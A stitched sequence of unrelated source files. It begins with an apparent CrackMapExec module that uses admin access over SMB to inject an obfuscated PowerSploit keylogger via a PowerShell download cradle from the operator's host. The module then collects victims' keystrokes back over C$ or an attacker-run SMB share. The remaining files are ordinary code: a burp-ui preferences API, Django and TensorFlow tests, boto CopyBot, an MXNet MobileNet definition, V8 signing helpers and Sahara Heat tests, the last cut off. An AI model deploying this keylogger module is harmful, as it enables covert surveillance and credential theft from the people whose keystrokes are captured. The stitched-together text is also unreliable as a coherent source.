supported_protocols = ['smb', 'mssql']
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
'''
TIMEOUT Specifies the interval in minutes to capture keystrokes.
STREAM Specifies whether to stream the keys over the network (default: False)
POLL Specifies the interval in seconds to poll the log file (default: 20)
'''
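        # Illustrative invocation (hypothetical target; exact CLI syntax may
        # vary between CrackMapExec versions):
        #   cme smb 192.168.1.10 -M get_keystrokes -o TIMEOUT=5 STREAM=True POLL=30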
if 'TIMEOUT' not in module_options:
context.log.error('TIMEOUT option is required!')
exit(1)
self.stream = False
self.poll = 20
self.timeout = int(module_options['TIMEOUT'])
if 'STREAM' in module_options:
self.stream = bool(module_options['STREAM'])
if 'POLL' in module_options:
self.poll = int(module_options['POLL'])
context.log.info('This module will not exit until CTRL-C is pressed')
context.log.info('Keystrokes will be stored in ~/.cme/logs\n')
self.ps_script1 = obfs_ps_script('cme_powershell_scripts/Invoke-PSInject.ps1')
self.ps_script2 = obfs_ps_script('powersploit/Exfiltration/Get-Keystrokes.ps1')
if self.stream:
self.share_name = gen_random_string(5).upper()
self.smb_server = CMESMBServer(context.log, self.share_name, context.log_folder_path)
self.smb_server.start()
else:
self.file_name = gen_random_string(5)
def on_admin_login(self, context, connection):
keys_folder = 'get_keystrokes_{}'.format(connection.host)
if not self.stream:
command = 'Get-Keystrokes -LogPath "$Env:Temp\\{}" -Timeout {}'.format(self.file_name, self.timeout)
else:
command = 'Get-Keystrokes -LogPath \\\\{}\\{}\\{}\\keys.log -Timeout {}'.format(context.localip, self.share_name, keys_folder, self.timeout)
keys_command = gen_ps_iex_cradle(context, 'Get-Keystrokes.ps1', command, post_back=False)
launcher = gen_ps_inject(keys_command, context)
ps_command = create_ps_command(launcher)
connection.execute(ps_command)
context.log.success('Executed launcher')
if not self.stream:
users = connection.loggedon_users()
keys_folder_path = os.path.join(context.log_folder_path, keys_folder)
try:
while True:
for user in users:
if '$' not in user.wkui1_username and os.path.exists(keys_folder_path):
keys_log = os.path.join(keys_folder_path, 'keys_{}.log'.format(user.wkui1_username))
with open(keys_log, 'a+') as key_file:
file_path = '/Users/{}/AppData/Local/Temp/{}'.format(user.wkui1_username, self.file_name)
try:
connection.conn.getFile('C$', file_path, key_file.write)
context.log.success('Got keys! Stored in {}'.format(keys_log))
except Exception as e:
context.log.debug('Error retrieving key file contents from {}: {}'.format(file_path, e))
sleep(self.poll)
except KeyboardInterrupt:
pass
def on_request(self, context, request):
if 'Invoke-PSInject.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script1)
elif 'Get-Keystrokes.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
# We received the callback, so lets setup the folder to store the keys
keys_folder_path = os.path.join(context.log_folder_path, 'get_keystrokes_{}'.format(request.client_address[0]))
if not os.path.exists(keys_folder_path): os.mkdir(keys_folder_path)
request.wfile.write(self.ps_script2)
request.stop_tracking_host()
else:
request.send_response(404)
request.end_headers()
def on_shutdown(self, context, connection):
if self.stream:
self.smb_server.shutdown()
| bsd-2-clause |
ziirish/burp-ui | burpui/api/prefs.py | 1 | 8540 | # -*- coding: utf8 -*-
"""
.. module:: burpui.api.prefs
:platform: Unix
:synopsis: Burp-UI prefs api module.
.. moduleauthor:: Ziirish <[email protected]>
"""
from flask import session, current_app, request
from flask_login import current_user
from werkzeug.datastructures import MultiDict
from . import api
from ..engines.server import BUIServer # noqa
from ..ext.i18n import LANGUAGES
from .custom import fields, Resource
bui = current_app # type: BUIServer
ns = api.namespace("preferences", "Preferences methods")
@ns.route("/ui/hide", endpoint="prefs_ui_hide")
class PrefsUIHide(Resource):
"""The :class:`burpui.api.prefs.PrefsUI` resource allows you to
set your UI preferences.
This resource is part of the :mod:`burpui.api.prefs` module.
"""
parser = ns.parser()
parser.add_argument("name", dest="client", help="Client to hide")
parser.add_argument("agent", dest="server", help="Server to hide")
hidden_model = ns.model(
"HiddenModel",
{
"client": fields.String(description="Hidden client name"),
"server": fields.String(description="Hidden server name"),
},
)
@ns.marshal_list_with(hidden_model, description="Success", code=200)
@ns.doc(
responses={
200: "Success",
403: "Insufficient permissions",
},
)
def get(self):
"""Returns a list of hidden clients/servers
**GET** method provided by the webservice.
:returns: list
"""
if (
bui.config["WITH_SQL"]
and not bui.config["BUI_DEMO"]
and not current_user.is_anonymous
):
from ..models import Hidden
return Hidden.query.filter_by(user=current_user.name).all()
return []
@ns.expect(parser)
@ns.marshal_with(hidden_model, description="Success", code=200)
@ns.doc(
responses={
200: "Success, object not recorder",
201: "Success, object recorded",
403: "Insufficient permissions",
500: "Internal server error",
},
)
def put(self):
"""Hide a client/server
**PUT** method provided by the webservice.
:returns: Object to hide
"""
ret = []
args = self.parser.parse_args()
if (
bui.config["WITH_SQL"]
and not bui.config["BUI_DEMO"]
and not current_user.is_anonymous
):
from ..ext.sql import db
from ..models import Hidden
client = args.get("client") or None
server = args.get("server") or None
hidden = Hidden.query.filter_by(
client=client, server=server, user=current_user.name
).first()
if not hidden:
hide = Hidden(current_user.name, client, server)
db.session.add(hide)
try:
db.session.commit()
except: # pragma: no cover
db.session.rollback()
self.abort(500, "Internal server error")
return hide, 201
return hidden
return ret
@ns.expect(parser)
@ns.doc(
responses={
204: "Success",
403: "Insufficient permissions",
500: "Internal server error",
},
)
def delete(self):
"""Make a client/server visible again
**DELETE** method provided by the webservice.
"""
args = self.parser.parse_args()
if (
bui.config["WITH_SQL"]
and not bui.config["BUI_DEMO"]
and not current_user.is_anonymous
):
from ..ext.sql import db
from ..models import Hidden
hide = Hidden.query.filter_by(
client=(args.get("client") or None),
server=(args.get("server") or None),
user=current_user.name,
).first()
if hide:
db.session.delete(hide)
try:
db.session.commit()
except: # pragma: no cover
db.session.rollback()
self.abort(500, "Internal server error")
return None, 204
@ns.route("/ui", endpoint="prefs_ui")
class PrefsUI(Resource):
"""The :class:`burpui.api.prefs.PrefsUI` resource allows you to
set your UI preferences.
This resource is part of the :mod:`burpui.api.prefs` module.
"""
parser = ns.parser()
parser.add_argument(
"pageLength", type=int, required=False, help="Number of element per page"
)
parser.add_argument(
"language",
type=str,
required=False,
help="Language",
choices=list(LANGUAGES.keys()),
)
parser.add_argument("dateFormat", type=str, required=False, help="Date format")
parser.add_argument("timezone", type=str, required=False, help="Timezone")
@staticmethod
def _user_language(language):
"""Set the current user language"""
if current_user and not current_user.is_anonymous and language:
setattr(current_user, "language", language)
def _store_prefs(self, key, val):
"""Store the prefs if persistent storage is enabled"""
if bui.config["WITH_SQL"] and not bui.config["BUI_DEMO"]:
from ..ext.sql import db
from ..models import Pref
pref = Pref.query.filter_by(user=current_user.name, key=key).first()
if pref:
if val:
pref.value = val
else:
db.session.delete(pref)
elif val:
pref = Pref(current_user.name, key, val)
db.session.add(pref)
try:
db.session.commit()
except: # pragma: no cover
db.session.rollback()
def _update_prefs(self):
"""update prefs"""
args = self.parser.parse_args()
sess = session._get_current_object()
ret = {}
req = MultiDict()
for loc in ["values", "json"]:
data = getattr(request, loc, None)
if data:
req.update(data)
for key in args.keys():
if key not in req:
continue
temp = args.get(key)
if temp:
if key == "language":
self._user_language(temp)
sess[key] = temp
elif key in sess: # pragma: no cover
del sess[key]
ret[key] = temp
self._store_prefs(key, temp)
return ret
@ns.doc(
responses={
200: "Success",
403: "Insufficient permissions",
},
)
def get(self):
"""Returns a list of prefs
**GET** method provided by the webservice.
:returns: prefs
"""
args = self.parser.parse_args()
ret = {}
sess = session
for key in args.keys():
ret[key] = sess.get(key)
return ret
@ns.expect(parser, validate=True)
@ns.doc(
responses={
201: "Success",
403: "Not allowed",
400: "Missing parameters",
},
)
def put(self):
"""Create prefs"""
return self._update_prefs(), 201
@ns.expect(parser)
@ns.doc(
responses={
200: "Success",
403: "Not allowed",
400: "Missing parameters",
},
)
def delete(self):
"""Delete prefs"""
args = self.parser.parse_args()
sess = session
ret = {}
for key in args.keys():
temp = args.get(key)
if temp:
del sess[key]
if bui.config["WITH_SQL"]:
from ..ext.sql import db
from ..models import Pref
try:
Pref.query.filter_by(user=current_user.name, key=key).delete()
db.session.commit()
except: # pragma: no cover
db.session.rollback()
ret[key] = sess.get(key)
return ret
@ns.expect(parser, validate=True)
@ns.doc(
responses={
200: "Success",
403: "Not allowed",
400: "Missing parameters",
},
)
def post(self):
"""Change prefs"""
return self._update_prefs()
| bsd-3-clause |
escottgoodwin/djangolocallibrary | tests/test_forms.py | 2 | 1550 | from django.test import TestCase
# Create your tests here.
import datetime
from django.utils import timezone
from catalog.forms import RenewBookForm
class RenewBookFormTest(TestCase):
def test_renew_form_date_field_label(self):
form = RenewBookForm()
        self.assertIn(form.fields['renewal_date'].label, (None, 'renewal date'))
def test_renew_form_date_field_help_text(self):
form = RenewBookForm()
self.assertEqual(form.fields['renewal_date'].help_text,'Enter a date between now and 4 weeks (default 3).')
def test_renew_form_date_in_past(self):
date = datetime.date.today() - datetime.timedelta(days=1)
form_data = {'renewal_date': date}
form = RenewBookForm(data=form_data)
self.assertFalse(form.is_valid())
def test_renew_form_date_too_far_in_future(self):
date = datetime.date.today() + datetime.timedelta(weeks=4) + datetime.timedelta(days=1)
form_data = {'renewal_date': date}
form = RenewBookForm(data=form_data)
self.assertFalse(form.is_valid())
def test_renew_form_date_today(self):
date = datetime.date.today()
form_data = {'renewal_date': date}
form = RenewBookForm(data=form_data)
self.assertTrue(form.is_valid())
def test_renew_form_date_max(self):
date = timezone.now() + datetime.timedelta(weeks=4)
form_data = {'renewal_date': date}
form = RenewBookForm(data=form_data)
self.assertTrue(form.is_valid())
| mit |
quickresolve/accel.ai | flask-aws/lib/python2.7/site-packages/boto/pyami/copybot.py | 17 | 4262 | # Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import boto
from boto.pyami.scriptbase import ScriptBase
import os, StringIO
class CopyBot(ScriptBase):
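    # Expected boto config entries (illustrative values; the option names are
    # taken from the boto.config.get() calls below and the section name comes
    # from self.name):
    #   src_bucket = source-bucket
    #   dst_bucket = destination-bucket
    #   replace_dst = True
    #   copy_acls = True
    #   exit_on_completion = True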
def __init__(self):
super(CopyBot, self).__init__()
self.wdir = boto.config.get('Pyami', 'working_dir')
self.log_file = '%s.log' % self.instance_id
self.log_path = os.path.join(self.wdir, self.log_file)
boto.set_file_logger(self.name, self.log_path)
self.src_name = boto.config.get(self.name, 'src_bucket')
self.dst_name = boto.config.get(self.name, 'dst_bucket')
self.replace = boto.config.getbool(self.name, 'replace_dst', True)
s3 = boto.connect_s3()
self.src = s3.lookup(self.src_name)
if not self.src:
boto.log.error('Source bucket does not exist: %s' % self.src_name)
dest_access_key = boto.config.get(self.name, 'dest_aws_access_key_id', None)
if dest_access_key:
dest_secret_key = boto.config.get(self.name, 'dest_aws_secret_access_key', None)
            s3 = boto.connect_s3(dest_access_key, dest_secret_key)
self.dst = s3.lookup(self.dst_name)
if not self.dst:
self.dst = s3.create_bucket(self.dst_name)
def copy_bucket_acl(self):
if boto.config.get(self.name, 'copy_acls', True):
acl = self.src.get_xml_acl()
self.dst.set_xml_acl(acl)
def copy_key_acl(self, src, dst):
if boto.config.get(self.name, 'copy_acls', True):
acl = src.get_xml_acl()
dst.set_xml_acl(acl)
def copy_keys(self):
boto.log.info('src=%s' % self.src.name)
boto.log.info('dst=%s' % self.dst.name)
try:
for key in self.src:
if not self.replace:
exists = self.dst.lookup(key.name)
if exists:
boto.log.info('key=%s already exists in %s, skipping' % (key.name, self.dst.name))
continue
boto.log.info('copying %d bytes from key=%s' % (key.size, key.name))
prefix, base = os.path.split(key.name)
path = os.path.join(self.wdir, base)
key.get_contents_to_filename(path)
new_key = self.dst.new_key(key.name)
new_key.set_contents_from_filename(path)
self.copy_key_acl(key, new_key)
os.unlink(path)
except:
boto.log.exception('Error copying key: %s' % key.name)
def copy_log(self):
key = self.dst.new_key(self.log_file)
key.set_contents_from_filename(self.log_path)
def main(self):
fp = StringIO.StringIO()
boto.config.dump_safe(fp)
self.notify('%s (%s) Starting' % (self.name, self.instance_id), fp.getvalue())
if self.src and self.dst:
self.copy_keys()
if self.dst:
self.copy_log()
self.notify('%s (%s) Stopping' % (self.name, self.instance_id),
'Copy Operation Complete')
if boto.config.getbool(self.name, 'exit_on_completion', True):
ec2 = boto.connect_ec2()
ec2.terminate_instances([self.instance_id])
| mit |
dendisuhubdy/tensorflow | tensorflow/contrib/constrained_optimization/python/candidates_test.py | 30 | 4188 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for constrained_optimization.python.candidates."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.constrained_optimization.python import candidates
from tensorflow.python.platform import test
class CandidatesTest(test.TestCase):
def test_inconsistent_shapes_for_best_distribution(self):
"""An error is raised when parameters have inconsistent shapes."""
objective_vector = np.array([1, 2, 3])
constraints_matrix = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
with self.assertRaises(ValueError):
_ = candidates.find_best_candidate_distribution(objective_vector,
constraints_matrix)
def test_inconsistent_shapes_for_best_index(self):
"""An error is raised when parameters have inconsistent shapes."""
objective_vector = np.array([1, 2, 3])
constraints_matrix = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
with self.assertRaises(ValueError):
_ = candidates.find_best_candidate_index(objective_vector,
constraints_matrix)
def test_best_distribution(self):
"""Distribution should match known solution."""
objective_vector = np.array(
[0.03053309, -0.06667082, 0.88355145, 0.46529806])
constraints_matrix = np.array(
[[-0.60164551, 0.36676229, 0.7856454, -0.8441711],
[0.00371592, -0.16392108, -0.59778071, -0.56908492]])
distribution = candidates.find_best_candidate_distribution(
objective_vector, constraints_matrix)
# Verify that the solution is a probability distribution.
self.assertTrue(np.all(distribution >= 0))
self.assertAlmostEqual(np.sum(distribution), 1.0)
# Verify that the solution satisfies the constraints.
maximum_constraint_violation = np.amax(
np.dot(constraints_matrix, distribution))
self.assertLessEqual(maximum_constraint_violation, 0)
# Verify that the solution matches that which we expect.
expected_distribution = np.array([0.37872711, 0.62127289, 0, 0])
self.assertAllClose(expected_distribution, distribution, rtol=0, atol=1e-6)
def test_best_index_rank_objectives_true(self):
"""Index should match known solution."""
# Objective ranks = [2, 1, 4, 3].
objective_vector = np.array(
[0.03053309, -0.06667082, 0.88355145, 0.46529806])
# Constraint ranks = [[1, 3, 4, 1], [4, 1, 1, 1]].
constraints_matrix = np.array(
[[-0.60164551, 0.36676229, 0.7856454, -0.8441711],
[0.00371592, -0.16392108, -0.59778071, -0.56908492]])
# Maximum ranks = [4, 3, 4, 3].
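    # The per-candidate maxima are [4, 3, 4, 3], so candidates 1 and 3 tie;
    # the assertion below expects candidate 1 (presumably the tie is broken
    # by its better objective rank, or simply by taking the first minimizer).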
index = candidates.find_best_candidate_index(
objective_vector, constraints_matrix, rank_objectives=True)
self.assertEqual(1, index)
def test_best_index_rank_objectives_false(self):
"""Index should match known solution."""
# Objective ranks = [2, 1, 4, 3].
objective_vector = np.array(
[0.03053309, -0.06667082, 0.88355145, 0.46529806])
# Constraint ranks = [[1, 3, 4, 1], [4, 1, 1, 1]].
constraints_matrix = np.array(
[[-0.60164551, 0.36676229, 0.7856454, -0.8441711],
[0.00371592, -0.16392108, -0.59778071, -0.56908492]])
# Maximum ranks = [4, 3, 4, 1].
index = candidates.find_best_candidate_index(
objective_vector, constraints_matrix, rank_objectives=False)
self.assertEqual(3, index)
if __name__ == "__main__":
test.main()
| apache-2.0 |
ucloud/uai-sdk | examples/mxnet/train/cifar/code/symbols/mobilenet.py | 28 | 4928 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import mxnet as mx
def Conv(data, num_filter=1, kernel=(1, 1), stride=(1, 1), pad=(0, 0), num_group=1, name=None, suffix=''):
conv = mx.sym.Convolution(data=data, num_filter=num_filter, kernel=kernel, num_group=num_group, stride=stride, pad=pad, no_bias=True, name='%s%s_conv2d' %(name, suffix))
bn = mx.sym.BatchNorm(data=conv, name='%s%s_batchnorm' %(name, suffix), fix_gamma=True)
act = mx.sym.Activation(data=bn, act_type='relu', name='%s%s_relu' %(name, suffix))
return act
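# Conv is the Conv-BatchNorm-ReLU building block. get_symbol composes it into
# depthwise-separable convolutions: a grouped 3x3 convolution with
# num_group == num_filter (the "_dw" layers) followed by a 1x1 pointwise
# convolution that mixes channels, as in the MobileNet architecture.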
def get_symbol(num_classes, **kwargs):
data = mx.symbol.Variable(name="data") # 224
conv_1 = Conv(data, num_filter=32, kernel=(3, 3), pad=(1, 1), stride=(2, 2), name="conv_1") # 224/112
conv_2_dw = Conv(conv_1, num_group=32, num_filter=32, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_2_dw") # 112/112
conv_2 = Conv(conv_2_dw, num_filter=64, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_2") # 112/112
conv_3_dw = Conv(conv_2, num_group=64, num_filter=64, kernel=(3, 3), pad=(1, 1), stride=(2, 2), name="conv_3_dw") # 112/56
conv_3 = Conv(conv_3_dw, num_filter=128, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_3") # 56/56
conv_4_dw = Conv(conv_3, num_group=128, num_filter=128, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_4_dw") # 56/56
conv_4 = Conv(conv_4_dw, num_filter=128, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_4") # 56/56
conv_5_dw = Conv(conv_4, num_group=128, num_filter=128, kernel=(3, 3), pad=(1, 1), stride=(2, 2), name="conv_5_dw") # 56/28
conv_5 = Conv(conv_5_dw, num_filter=256, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_5") # 28/28
conv_6_dw = Conv(conv_5, num_group=256, num_filter=256, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_6_dw") # 28/28
conv_6 = Conv(conv_6_dw, num_filter=256, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_6") # 28/28
conv_7_dw = Conv(conv_6, num_group=256, num_filter=256, kernel=(3, 3), pad=(1, 1), stride=(2, 2), name="conv_7_dw") # 28/14
conv_7 = Conv(conv_7_dw, num_filter=512, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_7") # 14/14
conv_8_dw = Conv(conv_7, num_group=512, num_filter=512, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_8_dw") # 14/14
conv_8 = Conv(conv_8_dw, num_filter=512, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_8") # 14/14
conv_9_dw = Conv(conv_8, num_group=512, num_filter=512, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_9_dw") # 14/14
conv_9 = Conv(conv_9_dw, num_filter=512, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_9") # 14/14
conv_10_dw = Conv(conv_9, num_group=512, num_filter=512, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_10_dw") # 14/14
conv_10 = Conv(conv_10_dw, num_filter=512, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_10") # 14/14
conv_11_dw = Conv(conv_10, num_group=512, num_filter=512, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_11_dw") # 14/14
conv_11 = Conv(conv_11_dw, num_filter=512, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_11") # 14/14
conv_12_dw = Conv(conv_11, num_group=512, num_filter=512, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_12_dw") # 14/14
conv_12 = Conv(conv_12_dw, num_filter=512, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_12") # 14/14
conv_13_dw = Conv(conv_12, num_group=512, num_filter=512, kernel=(3, 3), pad=(1, 1), stride=(2, 2), name="conv_13_dw") # 14/7
conv_13 = Conv(conv_13_dw, num_filter=1024, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_13") # 7/7
conv_14_dw = Conv(conv_13, num_group=1024, num_filter=1024, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_14_dw") # 7/7
conv_14 = Conv(conv_14_dw, num_filter=1024, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_14") # 7/7
pool = mx.sym.Pooling(data=conv_14, kernel=(7, 7), stride=(1, 1), pool_type="avg", name="global_pool")
flatten = mx.sym.Flatten(data=pool, name="flatten")
fc = mx.symbol.FullyConnected(data=flatten, num_hidden=num_classes, name='fc')
softmax = mx.symbol.SoftmaxOutput(data=fc, name='softmax')
return softmax
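# A minimal usage sketch (module API and shapes are illustrative only):
#
#   sym = get_symbol(num_classes=10)
#   mod = mx.mod.Module(symbol=sym, context=mx.cpu(),
#                       data_names=['data'], label_names=['softmax_label'])
#   mod.bind(data_shapes=[('data', (1, 3, 224, 224))], for_training=False)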
| apache-2.0 |
Jet-Streaming/framework | deps/v8/tools/testrunner/server/signatures.py | 123 | 2816 | # Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import base64
import os
import subprocess
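# ReadFileAndSignature returns [base64(contents), base64(signature)],
# re-creating <filename>.signature with the private key whenever it is missing
# or older than the file itself; if the openssl call fails it returns
# [None, exit_code]. VerifySignature writes the received contents and
# signature to disk, checks them against the public key, and removes both
# files when verification fails.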
def ReadFileAndSignature(filename):
with open(filename, "rb") as f:
file_contents = base64.b64encode(f.read())
signature_file = filename + ".signature"
if (not os.path.exists(signature_file) or
os.path.getmtime(signature_file) < os.path.getmtime(filename)):
private_key = "~/.ssh/v8_dtest"
code = subprocess.call("openssl dgst -out %s -sign %s %s" %
(signature_file, private_key, filename),
shell=True)
if code != 0: return [None, code]
with open(signature_file) as f:
signature = base64.b64encode(f.read())
return [file_contents, signature]
def VerifySignature(filename, file_contents, signature, pubkeyfile):
with open(filename, "wb") as f:
f.write(base64.b64decode(file_contents))
signature_file = filename + ".foreign_signature"
with open(signature_file, "wb") as f:
f.write(base64.b64decode(signature))
code = subprocess.call("openssl dgst -verify %s -signature %s %s" %
(pubkeyfile, signature_file, filename),
shell=True)
matched = (code == 0)
if not matched:
os.remove(signature_file)
os.remove(filename)
return matched
| mpl-2.0 |
xme1226/sahara | sahara/tests/unit/utils/test_heat.py | 2 | 10602 | # Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import mock
import testtools
from sahara import exceptions as ex
from sahara.tests.unit import base
from sahara.tests.unit import testutils as tu
from sahara.utils import files as f
from sahara.utils.openstack import heat as h
class TestHeat(testtools.TestCase):
def test_gets(self):
inst_name = "cluster-worker-001"
self.assertEqual(h._get_inst_name("cluster", "worker", 0), inst_name)
self.assertEqual(h._get_inst_name("CLUSTER", "WORKER", 0), inst_name)
self.assertEqual(h._get_port_name(inst_name),
"cluster-worker-001-port")
self.assertEqual(h._get_floating_name(inst_name),
"cluster-worker-001-floating")
self.assertEqual(h._get_floating_assoc_name(inst_name),
"cluster-worker-001-floating-assoc")
self.assertEqual(h._get_volume_name(inst_name, 1),
"cluster-worker-001-volume-1")
self.assertEqual(h._get_volume_attach_name(inst_name, 1),
"cluster-worker-001-volume-attachment-1")
def test_prepare_user_data(self):
userdata = "line1\nline2"
self.assertEqual(h._prepare_userdata(userdata), '"line1",\n"line2"')
class TestClusterTemplate(base.SaharaWithDbTestCase):
"""Checks valid structure of Resources section in generated Heat templates.
    1. It checks template generation with different OpenStack network
       setups: Neutron, and Nova Network with floating IP auto-assignment
       set to True or False.
    2. Cinder volume attachments.
    3. Basic instance creation with multi-line user data provided.
    4. The anti-affinity feature, with the proper nova scheduler hints
       included in the Heat templates.
"""
def _make_node_groups(self, floating_ip_pool=None, volume_type=None):
ng1 = tu.make_ng_dict('master', 42, ['namenode'], 1,
floating_ip_pool=floating_ip_pool, image_id=None,
volumes_per_node=0, volumes_size=0, id=1,
image_username='root', volume_type=None)
ng2 = tu.make_ng_dict('worker', 42, ['datanode'], 1,
floating_ip_pool=floating_ip_pool, image_id=None,
volumes_per_node=2, volumes_size=10, id=2,
image_username='root', volume_type=volume_type)
return ng1, ng2
def _make_cluster(self, mng_network, ng1, ng2, anti_affinity=[]):
return tu.create_cluster("cluster", "tenant1", "general",
"1.2.1", [ng1, ng2],
user_keypair_id='user_key',
neutron_management_network=mng_network,
default_image_id='1', image_id=None,
anti_affinity=anti_affinity)
def _make_heat_template(self, cluster, ng1, ng2):
heat_template = h.ClusterTemplate(cluster)
heat_template.add_node_group_extra(ng1['id'], 1,
get_ud_generator('line1\nline2'))
heat_template.add_node_group_extra(ng2['id'], 1,
get_ud_generator('line2\nline3'))
return heat_template
def test_get_anti_affinity_scheduler_hints(self):
ng1, ng2 = self._make_node_groups('floating')
cluster = self._make_cluster('private_net', ng1, ng2,
anti_affinity=["datanode"])
heat_template = self._make_heat_template(cluster, ng1, ng2)
ng1 = [ng for ng in cluster.node_groups if ng.name == "master"][0]
ng2 = [ng for ng in cluster.node_groups if ng.name == "worker"][0]
expected = ('"scheduler_hints" : '
'{"group": {"Ref": "cluster-aa-group"}},')
actual = heat_template._get_anti_affinity_scheduler_hints(ng2)
self.assertEqual(expected, actual)
expected = ''
actual = heat_template._get_anti_affinity_scheduler_hints(ng1)
self.assertEqual(expected, actual)
def test_load_template_use_neutron(self):
"""Test for Heat cluster template with Neutron enabled.
Two NodeGroups used: 'master' with Ephemeral drive attached and
'worker' with 2 attached volumes 10GB size each
"""
ng1, ng2 = self._make_node_groups('floating', 'vol_type')
cluster = self._make_cluster('private_net', ng1, ng2)
heat_template = self._make_heat_template(cluster, ng1, ng2)
self.override_config("use_neutron", True)
main_template = h._load_template(
'main.heat', {'resources':
heat_template._serialize_resources()})
self.assertEqual(
json.loads(main_template),
json.loads(f.get_file_text(
"tests/unit/resources/"
"test_serialize_resources_use_neutron.heat")))
def test_load_template_use_nova_network_without_autoassignment(self):
"""Checks Heat cluster template with Nova Network enabled.
Nova Network checked without autoassignment of floating ip.
Two NodeGroups used: 'master' with Ephemeral drive attached and
'worker' with 2 attached volumes 10GB size each
"""
ng1, ng2 = self._make_node_groups('floating')
cluster = self._make_cluster(None, ng1, ng2)
